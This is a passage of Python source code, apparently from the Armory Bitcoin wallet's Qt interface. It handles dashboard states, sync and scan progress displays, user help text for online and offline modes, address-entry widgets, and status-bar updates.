self.lblTimeLeftSync.setVisible(True)
self.barProgressSync.setFormat('%p%')
self.barProgressSync.setRange(0,100)
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setValue(0)
self.barProgressBuild.setFormat('')
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setValue(0)
self.barProgressScan.setFormat('')
if sdmStr == 'NodeStatus_Syncing':
sdmPercent = sdmState.chainState_.getProgressPct() * 100
self.lblTimeLeftSync.setText(\
"%d blocks remaining" % sdmState.chainState_.getBlocksLeft())
elif sdmStr == 'NodeStatus_Initializing':
sdmPercent = 0
self.barProgressSync.setRange(0,0)
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
else:
LOGERROR('Should not predict sync info in non init/sync SDM state')
return ('UNKNOWN','UNKNOWN', 'UNKNOWN')
self.barProgressSync.setValue(sdmPercent)
else:
LOGWARN('Called updateSyncProgress while not sync\'ing')
#############################################################################
def GetDashFunctionalityText(self, func):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
if func.lower() == 'scanning':
return self.tr( \
'The following functionalities are available while scanning in offline mode:'
'<ul>'
'<li>Create new wallets</li>'
'<li>Generate receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign transactions created from an online system</li>'
'<li>Sign messages</li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, even if you are offline. It is perfectly '
            'okay to create and distribute payment addresses while Armory is offline; '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'offline':
return self.tr( \
'The following functionalities are available in offline mode:'
'<ul>'
'<li>Create, import or recover wallets</li>'
'<li>Generate new receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Import private keys to wallets</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign messages</li>'
'<li><b>Sign transactions created from an online system</b></li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, regardless of whether you are online. It is perfectly '
            'okay to create and distribute payment addresses while Armory is offline; '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'online':
return self.tr( \
'<ul>'
'<li>Create, import or recover Armory wallets</li>'
'<li>Generate new addresses to receive coins</li>'
'<li>Send bitcoins to other people</li>'
'<li>Create one-time backups of your wallets (in printed or digital form)</li>'
'<li>Click on "bitcoin:" links in your web browser '
'(not supported on all operating systems)</li>'
'<li>Import private keys to wallets</li>'
'<li>Monitor payments to watching-only wallets and create '
'unsigned transactions</li>'
'<li>Sign messages</li>'
'<li><b>Create transactions with watching-only wallets, '
            'to be signed by an offline wallet</b></li>'
'</ul>')
#############################################################################
def GetDashStateText(self, mgmtMode, state):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
# A few states don't care which mgmtMode you are in...
if state == 'NewUserInfo':
return self.tr(
'For more information about Armory, and even Bitcoin itself, you should '
'visit the <a href="https://bitcointalk.org/index.php?board=97.0">Armory Forum</a> '
'and <a href="https://bitcoin.org">Bitcoin.org</a>. If '
'you are experiencing problems using this software, please visit the '
'<a href="https://bitcointalk.org/index.php?board=97.0">Armory Forum</a>. Users '
'there will help you with any issues that you have. '
'<br><br>'
'<b><u>IMPORTANT:</u></b> Make a backup of your wallet(s)! Paper '
'backups protect you <i>forever</i> against forgotten passwords, '
'hard-drive failure, and make it easy for your family to recover '
'your funds if something terrible happens to you. <i>Each wallet '
'only needs to be backed up once, ever!</i> Without it, you are at '
'risk of losing all of your Bitcoins! '
'<br><br>')
elif state == 'OnlineFull1':
return self.tr( \
'<p><b>You now have access to all the features Armory has to offer!</b><br>'
'To see your balances and transaction history, please click '
'on the "Transactions" tab above this text. <br>'
            'Here are some things you can do with the Armory Bitcoin Client:'
'<br>')
elif state == 'OnlineFull2':
return ( \
(self.tr('If you experience any performance issues with Armory, '
'please confirm that Bitcoin Core is running and <i>fully '
'synchronized with the Bitcoin network</i>. You will see '
'a green checkmark in the bottom right corner of the '
'Bitcoin Core window if it is synchronized. If not, it is '
'recommended you close Armory and restart it only when you '
'see that checkmark.'
'<br><br>') if not self.doAutoBitcoind else '') + self.tr(
'<b>Please backup your wallets!</b> Armory wallets are '
'"deterministic", meaning they only need to be backed up '
'one time (unless you have imported external addresses/keys). '
'Make a backup and keep it in a safe place! All funds from '
'Armory-generated addresses will always be recoverable with '
'a paper backup, any time in the future. Use the "Backup '
'Individual Keys" option for each wallet to backup imported '
'keys.</p>'))
elif state == 'OnlineNeedSweep':
return self.tr( \
'Armory is currently online, but you have requested a sweep operation '
'on one or more private keys. This requires searching the global '
'transaction history for the available balance of the keys to be '
'swept. '
'<br><br>'
'Press the button to start the blockchain scan, which '
'will also put Armory into offline mode for a few minutes '
'until the scan operation is complete.')
elif state == 'OnlineDirty':
return self.tr( \
'<b>Wallet balances may '
'be incorrect until the rescan operation is performed!</b>'
'<br><br>'
'Armory is currently online, but addresses/keys have been added '
'without rescanning the blockchain. You may continue using '
'Armory in online mode, but any transactions associated with the '
'new addresses will not appear in the ledger. '
'<br><br>'
'Pressing the button above will put Armory into offline mode '
'for a few minutes until the scan operation is complete.')
elif state == 'OfflineNoSatoshiNoInternet':
return self.tr( \
'There is no connection to the internet, and there is no other '
'Bitcoin software running. Most likely '
'you are here because this is a system dedicated '
            'to managing offline wallets! '
'<br><br>'
'<b>If you expected Armory to be in online mode</b>, '
'please verify your internet connection is active, '
'then restart Armory. If you think the lack of internet '
'connection is in error (such as if you are using Tor), '
'then you can restart Armory with the "--skip-online-check" '
'option, or change it in the Armory settings.'
'<br><br>'
'If you do not have Bitcoin Core installed, you can '
'download it from <a href="https://bitcoin.org">'
'https://bitcoin.org</a>.')
# Branch the available display text based on which Satoshi-Management
# mode Armory is using. It probably wasn't necessary to branch the
      # code like this, but it helped me organize the seemingly-endless
# number of dashboard screens I need
if mgmtMode.lower()=='user':
if state == 'OfflineButOnlinePossible':
return self.tr( \
'You are currently in offline mode, but can '
'switch to online mode by pressing the button above. However, '
'it is not recommended that you switch until '
'Bitcoin Core/bitcoind is fully synchronized with the bitcoin network. '
'You will see a green checkmark in the bottom-right corner of '
'the Bitcoin Core window when it is finished.'
'<br><br>'
'Switching to online mode will give you access '
'to more Armory functionality, including sending and receiving '
'bitcoins and viewing the balances and transaction histories '
'of each of your wallets.<br><br>')
elif state == 'OfflineNoSatoshi':
bitconf = os.path.join(BTC_HOME_DIR, 'bitcoin.conf')
return self.tr( \
'You are currently in offline mode because '
'Bitcoin Core is not running. To switch to online '
'mode, start Bitcoin Core and let it synchronize with the network '
'-- you will see a green checkmark in the bottom-right corner when '
'it is complete. If Bitcoin Core is already running and you believe '
'the lack of connection is an error (especially if using proxies), '
'please see <a href="'
'https://bitcointalk.org/index.php?topic=155717.msg1719077#msg1719077">'
'this link</a> for options.'
'<br><br>'
'<b>If you prefer to have Armory do this for you</b>, '
'then please check "Let Armory run '
'Bitcoin Core in the background" under "File"->"Settings."'
'<br><br>'
'If you already know what you\'re doing and simply need '
'to fetch the latest version of Bitcoin Core, you can download it from '
'<a href="https://bitcoin.org">https://bitcoin.org</a>.')
elif state == 'OfflineNoInternet':
return self.tr( \
'You are currently in offline mode because '
'Armory could not detect an internet connection. '
               'If you think this is in error, then '
               'restart Armory using the "--skip-online-check" option, '
               'or adjust the Armory settings and then restart Armory.'
'<br><br>'
'If this is intended to be an offline computer, note '
'that it is not necessary to have Bitcoin Core or bitcoind '
'running.' )
elif state == 'OfflineNoBlkFiles':
return self.tr( \
'You are currently in offline mode because '
'Armory could not find the blockchain files produced '
'by Bitcoin Core. Do you run Bitcoin Core (or bitcoind) '
'from a non-standard directory? Armory expects to '
'find the blkXXXX.dat files in <br><br>%1<br><br> '
'If you know where they are located, please restart '
               'Armory using the "--satoshi-datadir=[path]" option '
               'to tell Armory where to find them.').arg(BLKFILE_DIR)
elif state == 'Disconnected':
return self.tr( \
'Armory was previously online, but the connection to Bitcoin Core/'
'bitcoind was interrupted. You will not be able to send bitcoins '
'or confirm receipt of bitcoins until the connection is '
'reestablished. <br><br>Please check that Bitcoin Core is open '
'and synchronized with the network. Armory will <i>try to '
'reconnect</i> automatically when the connection is available '
'again. If Bitcoin Core is available again, and reconnection does '
'not happen, please restart Armory.<br><br>')
elif state == 'ScanNoWallets':
return self.tr( \
'Please wait while the global transaction history is scanned. '
'Armory will go into online mode automatically, as soon as '
'the scan is complete.')
elif state == 'ScanWithWallets':
return self.tr( \
'Armory is scanning the global transaction history to retrieve '
'information about your wallets. The "Transactions" tab will '
'be updated with wallet balance and history as soon as the scan is '
'complete. You may manage your wallets while you wait.<br><br>')
else:
LOGERROR('Unrecognized dashboard state: Mgmt:%s, State:%s', \
mgmtMode, state)
return ''
elif mgmtMode.lower()=='auto':
if state == 'OfflineBitcoindRunning':
return self.tr( \
'It appears you are already running Bitcoin software '
'(Bitcoin Core or bitcoind). '
'Unlike previous versions of Armory, you should <u>not</u> run '
'this software yourself -- Armory '
'will run it in the background for you. Either close the '
'Bitcoin application or adjust your settings. If you change '
'your settings, then please restart Armory.')
if state == 'OfflineNeedBitcoinInst':
return self.tr( \
'<b>Only one more step to getting online with Armory!</b> You '
'must install the Bitcoin software from https://bitcoin.org in order '
'for Armory to communicate with the Bitcoin network. If the '
'Bitcoin software is already installed and/or you would prefer '
'to manage it yourself, please adjust your settings and '
'restart Armory.')
if state == 'InitializingLongTime':
return self.tr(
'<b>To maximize your security, the Bitcoin engine is downloading '
'and verifying the global transaction ledger. <u>This will take '
'several hours, but only needs to be done once</u>!</b> It is '
               'usually best to leave it running overnight for this '
'initialization process. Subsequent loads will only take a few '
'minutes. '
'<br><br> '
'<b>Please Note:</b> Between Armory and the underlying Bitcoin '
'engine, you need to have 120-130 GB of spare disk space available '
'to hold the global transaction history. '
'<br><br> '
'While you wait, you can manage your wallets. Make new wallets, '
'make digital or paper backups, create Bitcoin addresses to receive '
'payments, '
'sign messages, and/or import private keys. You will always '
'receive Bitcoin payments regardless of whether you are online, '
'but you will have to verify that payment through another service '
               'until Armory has finished this initialization.')
if state == 'InitializingDoneSoon':
msg = self.tr( \
'The software is downloading and processing the latest activity '
'on the network related to your wallet(s). This should take only '
'a few minutes. While you wait, you can manage your wallet(s). '
'<br><br>'
'Now would be a good time to make paper (or digital) backups of '
'your wallet(s) if you have not done so already! You are protected '
'<i>forever</i> from hard-drive loss, or forgetting your password. '
'If you do not have a backup, you could lose all of your '
'Bitcoins forever!', "", len(self.walletMap))
return msg
if state == 'OnlineDisconnected':
return self.tr( \
'Armory\'s communication with the Bitcoin network was interrupted. '
'This usually does not happen unless you closed the process that '
'Armory was using to communicate with the network. Armory requires '
'%1 to be running in the background, and this error pops up if it '
'disappears.'
'<br><br>You may continue in offline mode, or you can close '
'all Bitcoin processes and restart Armory.').arg(os.path.basename(TheSDM.executable))
if state == 'OfflineBadConnection':
return self.tr( \
'Armory has experienced an issue trying to communicate with the '
'Bitcoin software. The software is running in the background, '
'but Armory cannot communicate with it through RPC as it expects '
'to be able to. If you changed any settings in the Bitcoin home '
'directory, please make sure that RPC is enabled and that it is '
'accepting connections from localhost. '
'<br><br>'
'If you have not changed anything, please export the log file '
'(from the "File" menu) and open an issue at https://github.com/goatpig/BitcoinArmory/issues')
if state == 'OfflineSatoshiAvail':
return self.tr( \
'Armory does not detect internet access, but it does detect '
'running Bitcoin software. Armory is in offline-mode. <br><br>'
'If you are intending to run an offline system, you will not '
'need to have the Bitcoin software installed on the offline '
'computer. It is only needed for the online computer. '
'If you expected to be online and '
'the absence of internet is an error, please restart Armory '
'using the "--skip-online-check" option. ')
if state == 'OfflineForcedButSatoshiAvail':
return self.tr( \
'Armory was started in offline-mode, but detected you are '
'running Bitcoin software. If you are intending to run an '
'offline system, you will <u>not</u> need to have the Bitcoin '
'software installed or running on the offline '
'computer. It is only required for being online. ')
if state == 'OfflineBadDBEnv':
return self.tr( \
'The Bitcoin software indicates there '
'is a problem with its databases. This can occur when '
'Bitcoin Core/bitcoind is upgraded or downgraded, or sometimes '
'just by chance after an unclean shutdown.'
'<br><br>'
'You can either revert your installed Bitcoin software to the '
'last known working version (but not earlier than version 0.8.1) '
'or delete everything <b>except</b> "wallet.dat" from your Bitcoin '
'home directory '
'<font face="courier"><b>%1</b></font>'
'<br><br>'
'If you choose to delete the contents of the Bitcoin home '
'directory, you will have to do a fresh download of the blockchain '
'again, which will require a few hours the first '
'time.').arg(self.satoshiHomePath)
if state == 'OfflineBtcdCrashed':
            sout = '' if TheSDM.btcOut is None else str(TheSDM.btcOut)
            serr = '' if TheSDM.btcErr is None else str(TheSDM.btcErr)
soutHtml = '<br><br>' + '<br>'.join(sout.strip().split('\n'))
serrHtml = '<br><br>' + '<br>'.join(serr.strip().split('\n'))
soutDisp = '<b><font face="courier">StdOut: %s</font></b>' % soutHtml
serrDisp = '<b><font face="courier">StdErr: %s</font></b>' % serrHtml
if len(sout)>0 or len(serr)>0:
return (self.tr(
'There was an error starting the underlying Bitcoin engine. '
'This should not normally happen. Usually it occurs when you '
'have been using Bitcoin Core prior to using Armory, especially '
'if you have upgraded or downgraded Bitcoin Core recently. '
'Output from bitcoind:<br>') + \
(soutDisp if len(sout)>0 else '') + \
(serrDisp if len(serr)>0 else '') )
else:
return ( self.tr(
'There was an error starting the underlying Bitcoin engine. '
'This should not normally happen. Usually it occurs when you '
'have been using Bitcoin Core prior to using Armory, especially '
'if you have upgraded or downgraded Bitcoin Core recently. '
'<br><br> '
'Unfortunately, this error is so strange, Armory does not '
'recognize it. Please go to "Export Log File" from the "File" '
'menu and submit an issue at https://github.com/goatpig/BitcoinArmory/issues. '
'We apologize for the inconvenience!'))
# TODO - move out of polling and call on events
#############################################################################
def setDashboardDetails(self, INIT=False):
"""
We've dumped all the dashboard text into the above 2 methods in order
to declutter this method.
"""
if self.isShuttingDown:
return
sdmStr = TheSDM.getSDMStateStr()
bdmState = TheBDM.getState()
descr = ''
descr1 = ''
descr2 = ''
# Methods for showing/hiding groups of widgets on the dashboard
def setBtnRowVisible(r, visBool):
for c in range(3):
self.dashBtns[r][c].setVisible(visBool)
def setSyncRowVisible(b):
self.lblDashModeSync.setVisible(b)
self.barProgressSync.setVisible(b)
self.lblTimeLeftSync.setVisible(b)
def setBuildRowVisible(b):
self.lblDashModeBuild.setVisible(b)
self.barProgressBuild.setVisible(b)
self.lblTimeLeftBuild.setVisible(b)
def setScanRowVisible(b):
self.lblDashModeScan.setVisible(b)
self.barProgressScan.setVisible(b)
self.lblTimeLeftScan.setVisible(b)
def setOnlyDashModeVisible():
setSyncRowVisible(False)
setBuildRowVisible(False)
setScanRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setVisible(True)
def setBtnFrameVisible(b, descr=''):
self.frmDashMidButtons.setVisible(b)
self.lblDashBtnDescr.setVisible(len(descr)>0)
self.lblDashBtnDescr.setText(descr)
if INIT:
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Install, False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Instruct, False)
setBtnRowVisible(DASHBTNS.Settings, False)
setBtnRowVisible(DASHBTNS.Close, False)
setOnlyDashModeVisible()
if sdmStr != self.lastSDMStr:
if sdmStr == "NodeStatus_Offline":
# User is letting Armory manage the Satoshi client for them.
setSyncRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
# There's a whole bunch of stuff that has to be hidden/shown
# depending on the state... set some reasonable defaults here
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnRowVisible(DASHBTNS.Close, False)
if self.internetStatus == INTERNET_STATUS.Unavailable or CLI_OPTIONS.offline:
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblDashModeSync.setText( self.tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
if TheSDM.satoshiIsAvailable():
self.frmDashMidButtons.setVisible(True)
setBtnRowVisible(DASHBTNS.Close, True)
if CLI_OPTIONS.offline:
# Forced offline but bitcoind is running
LOGINFO('Dashboard switched to auto-OfflineForcedButSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineForcedButSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineNoSatoshiNoInternet')
setBtnFrameVisible(True, \
self.tr('In case you actually do have internet access, you can use '
'the following links to get Armory installed. Or change '
'your settings.'))
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
descr1 += self.GetDashStateText('Auto','OfflineNoSatoshiNoInternet')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmStr == "NodeStatus_BadPath":
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.lblDashModeSync.setText( self.tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
LOGINFO('Dashboard switched to auto-cannotFindExeHome')
self.lblDashModeSync.setText(self.tr('Cannot find Bitcoin Home Directory'), \
size=4, bold=True)
setBtnRowVisible(DASHBTNS.Close, TheSDM.satoshiIsAvailable())
setBtnRowVisible(DASHBTNS.Install, True)
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setText(self.tr('Check Again'))
setBtnFrameVisible(True)
descr1 += self.GetDashStateText('Auto', 'OfflineNeedBitcoinInst')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmStr == "NodeStatus_Initializing" or \
sdmStr == "NodeStatus_Syncing":
self.wasSynchronizing = True
LOGINFO('Dashboard switched to auto-InitSync')
self.lblBusy.setVisible(True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.updateSyncProgress()
# If torrent ever ran, leave it visible
setSyncRowVisible(True)
setScanRowVisible(True)
if sdmStr == "NodeStatus_Initializing":
self.lblDashModeSync.setText( self.tr('Initializing Bitcoin Engine'), size=4, bold=True, color='Foreground')
elif sdmStr == "NodeStatus_Syncing":
self.lblDashModeSync.setText( self.tr('Synchronizing with Network'), size=4, bold=True, color='Foreground')
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
descr1 += self.GetDashStateText('Auto', 'InitializingDoneSoon')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnFrameVisible(True, \
self.tr('Since version 0.88, Armory runs bitcoind in the '
'background. You can switch back to '
'the old way in the Settings dialog. '))
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
self.lastSDMStr = sdmStr
if bdmState == BDM_BLOCKCHAIN_READY:
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
self.lblBusy.setVisible(False)
if self.netMode == NETWORKMODE.Disconnected:
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( self.tr('Armory is disconnected'), size=4, color='TextWarn', bold=True)
descr = self.GetDashStateText('User','Disconnected')
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
else:
# Fully online mode
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( self.tr('Armory is online!'), color='TextGreen', size=4, bold=True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
descr = self.GetDashStateText('User', 'OnlineFull1')
descr += self.GetDashFunctionalityText('Online')
descr += self.GetDashStateText('User', 'OnlineFull2')
self.lblDashDescr1.setText(descr)
elif bdmState == BDM_SCANNING or bdmState == BDM_UNINITIALIZED:
LOGINFO('Dashboard switched to "Scanning" mode')
setSyncRowVisible(False)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(True)
self.lblBusy.setVisible(True)
self.btnModeSwitch.setVisible(False)
if sdmStr == 'NodeStatus_Ready':
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.lblDashModeSync.setVisible(True)
self.lblTimeLeftSync.setText('')
self.lblDashModeSync.setText( self.tr('Synchronizing with Network'), \
size=4, bold=True, color='DisableFG')
else:
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(False)
if len(unicode(self.lblDashModeBuild.text()).strip()) == 0:
self.lblDashModeBuild.setText( self.tr('Preparing Databases'), \
size=4, bold=True, color='Foreground')
if len(unicode(self.lblDashModeScan.text()).strip()) == 0:
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
if len(self.walletMap)==0:
descr = self.GetDashStateText('User','ScanNoWallets')
else:
descr = self.GetDashStateText('User','ScanWithWallets')
descr += self.GetDashStateText('Auto', 'NewUserInfo')
descr += self.GetDashFunctionalityText('Scanning') + '<br>'
self.lblDashDescr1.setText(descr)
self.lblDashDescr2.setText('')
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
elif bdmState == BDM_OFFLINE:
pass
else:
LOGERROR('What the heck blockchain mode are we in? %s', bdmState)
self.lblDashModeSync.setContentsMargins( 50,5,50,5)
self.lblDashModeBuild.setContentsMargins(50,5,50,5)
self.lblDashModeScan.setContentsMargins( 50,5,50,5)
vbar = self.dashScrollArea.verticalScrollBar()
# On Macs, this causes the main window scroll area to keep bouncing back
# to the top. Not setting the value seems to fix it. DR - 2014/02/12
if not OS_MACOSX:
vbar.setValue(vbar.minimum())
if self.lblBusy.isVisible():
self.numHeartBeat += 1
self.lblBusy.setPixmap(QPixmap(':/loadicon_%d.png' % \
(self.numHeartBeat%6)))
#############################################################################
def createToolTipWidget(self, tiptext, iconSz=2):
"""
      The <u></u> is to signal to Qt that it should be interpreted as HTML/Rich
text even if no HTML tags are used. This appears to be necessary for Qt
to wrap the tooltip text
"""
fgColor = htmlColor('ToolTipQ')
lbl = QLabel('<font size=%d color=%s>(?)</font>' % (iconSz, fgColor))
lbl.setMaximumWidth(relaxedSizeStr(lbl, '(?)')[0])
def setAllText(wself, txt):
def pressEv(ev):
QWhatsThis.showText(ev.globalPos(), txt, self)
wself.mousePressEvent = pressEv
wself.setToolTip('<u></u>' + txt)
# Calling setText on this widget will update both the tooltip and QWT
from types import MethodType
lbl.setText = MethodType(setAllText, lbl)
lbl.setText(tiptext)
return lbl
#############################################################################
def createAddressEntryWidgets(self, parent, initString='', maxDetectLen=128,
boldDetectParts=0, **cabbKWArgs):
"""
If you are putting the LBL_DETECT somewhere that is space-constrained,
set maxDetectLen to a smaller value. It will limit the number of chars
to be included in the autodetect label.
"cabbKWArgs" is "create address book button kwargs"
Here's the signature of that function... you can pass any named args
to this function and they will be passed along to createAddrBookButton
def createAddrBookButton(parent, targWidget, defaultWltID=None,
actionStr="Select", selectExistingOnly=False,
selectMineOnly=False, getPubKey=False,
showLockboxes=True)
Returns three widgets that can be put into layouts:
[[QLineEdit: addr/pubkey]] [[Button: Addrbook]]
[[Label: Wallet/Lockbox/Addr autodetect]]
"""
addrEntryObjs = {}
addrEntryObjs['QLE_ADDR'] = QLineEdit()
addrEntryObjs['QLE_ADDR'].setText(initString)
addrEntryObjs['BTN_BOOK'] = createAddrBookButton(parent,
addrEntryObjs['QLE_ADDR'],
**cabbKWArgs)
addrEntryObjs['LBL_DETECT'] = QRichLabel('')
addrEntryObjs['CALLBACK_GETSCRIPT'] = None
##########################################################################
# Create a function that reads the user string and updates labels if
# the entry is recognized. This will be used to automatically show the
# user that what they entered is recognized and gives them more info
#
# It's a little awkward to put this whole thing in here... this could
# probably use some refactoring
def updateAddrDetectLabels():
try:
enteredText = str(addrEntryObjs['QLE_ADDR'].text()).strip()
scriptInfo = self.getScriptForUserString(enteredText)
displayInfo = self.getDisplayStringForScript(
scriptInfo['Script'], maxDetectLen, boldDetectParts,
prefIDOverAddr=scriptInfo['ShowID'])
dispStr = displayInfo['String']
if displayInfo['WltID'] is None and displayInfo['LboxID'] is None:
addrEntryObjs['LBL_DETECT'].setText(dispStr)
else:
addrEntryObjs['LBL_DETECT'].setText(dispStr, color='TextBlue')
# No point in repeating what the user just entered
addrEntryObjs['LBL_DETECT'].setVisible(enteredText != dispStr)
addrEntryObjs['QLE_ADDR'].setCursorPosition(0)
except:
#LOGEXCEPT('Invalid recipient string')
addrEntryObjs['LBL_DETECT'].setVisible(False)
# End function to be connected
##########################################################################
# Now actually connect the entry widgets
parent.connect(addrEntryObjs['QLE_ADDR'], SIGNAL('textChanged(QString)'),
updateAddrDetectLabels)
updateAddrDetectLabels()
# Create a func that can be called to get the script that was entered
# This uses getScriptForUserString() which actually returns 4 vals
# rawScript, wltIDorNone, lboxIDorNone, addrStringEntered
# (The last one is really only used to determine what info is most
# relevant to display to the user...it can be ignored in most cases)
def getScript():
entered = str(addrEntryObjs['QLE_ADDR'].text()).strip()
return self.getScriptForUserString(entered)
addrEntryObjs['CALLBACK_GETSCRIPT'] = getScript
return addrEntryObjs
#############################################################################
def getScriptForUserString(self, userStr):
return getScriptForUserString(userStr, self.walletMap, self.allLockboxes)
#############################################################################
def getDisplayStringForScript(self, binScript, maxChars=256,
doBold=0, prefIDOverAddr=False,
lblTrunc=12, lastTrunc=12):
return getDisplayStringForScript(binScript, self.walletMap,
self.allLockboxes, maxChars, doBold,
prefIDOverAddr, lblTrunc, lastTrunc)
#############################################################################
def updateWalletData(self):
for wltid in self.walletMap:
self.walletMap[wltid].getBalancesAndCountFromDB()
self.walletMap[wltid].getAddrDataFromDB()
for lbid in self.cppLockboxWltMap:
self.cppLockboxWltMap[lbid].getBalancesAndCountFromDB(\
TheBDM.topBlockHeight, IGNOREZC)
#############################################################################
def updateStatusBarText(self):
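      # Status color convention: green = node online with RPC available,
      # purple = online but RPC unavailable, red = node offline.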
if self.nodeStatus.status_ == Cpp.NodeStatus_Online:
haveRPC = (self.nodeStatus.rpcStatus_ == RpcStatus_Online)
if haveRPC:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1>Connected (%2 blocks)</font> ').arg(
htmlColor('TextGreen'), str(TheBDM.getTopBlockHeight())))
else:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1><b>Connected (%2 blocks)</b></font> ').arg(
htmlColor('TextPurple'), str(TheBDM.getTopBlockHeight())))
def getToolTipTextOnline():
tt = QString()
if not haveRPC:
tt = self.tr('RPC disabled!<br><br>')
blkRecvAgo = RightNow() - self.blkReceived
tt = tt + self.tr('Last block received %1 ago').arg(secondsToHumanTime(blkRecvAgo))
return tt
self.lblArmoryStatus.setToolTipLambda(getToolTipTextOnline)
elif self.nodeStatus.status_ == Cpp.NodeStatus_Offline:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1><b>Node offline (%2 blocks)</b></font> ').arg(\
htmlColor('TextRed')).arg(TheBDM.getTopBlockHeight()))
def getToolTipTextOffline():
blkRecvAgo = RightNow() - self.blkReceived
tt = self.tr(
'Disconnected from Bitcoin Node, cannot update history '
'<br><br>Last known block: %1 <br>Received %2 ago').arg(TheBDM.getTopBlockHeight()).arg(secondsToHumanTime(blkRecvAgo))
return tt
self.lblArmoryStatus.setToolTipLambda(getToolTipTextOffline)
#############################################################################
def handleCppNotification(self, action, args):
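      # Dispatch for notifications coming from the C++ BlockDataManager:
      # FINISH_LOAD_BLOCKCHAIN_ACTION, NEW_ZC_ACTION, NEW_BLOCK_ACTION,
      # REFRESH_ACTION, WARNING_ACTION, SCAN_ACTION, NODESTATUS_UPDATE,
      # BDM_SCAN_PROGRESS and BDV_ERROR, each handled in a branch below.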
if action == FINISH_LOAD_BLOCKCHAIN_ACTION:
#Blockchain just finished loading, finish initializing UI and render the
#ledgers
self.nodeStatus = TheBDM.bdv().getNodeStatus()
TheBDM.setWitness(self.nodeStatus.SegWitEnabled_)
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
for wltid in self.walletMap:
self.walletMap[wltid].detectHighestUsedIndex()
self.blkReceived = RightNow()
if self.needUpdateAfterScan:
LOGDEBUG('Running finishLoadBlockchain')
self.finishLoadBlockchainGUI()
self.needUpdateAfterScan = False
self.setDashboardDetails()
self.updateStatusBarText()
elif action == NEW_ZC_ACTION and not CLI_OPTIONS.ignoreZC:
         #A zero-conf Tx concerns one of the addresses Armory is tracking; pull
         #the updated ledgers from the BDM and create the related notifications.
try:
self.updateWalletData()
except Exception as e:
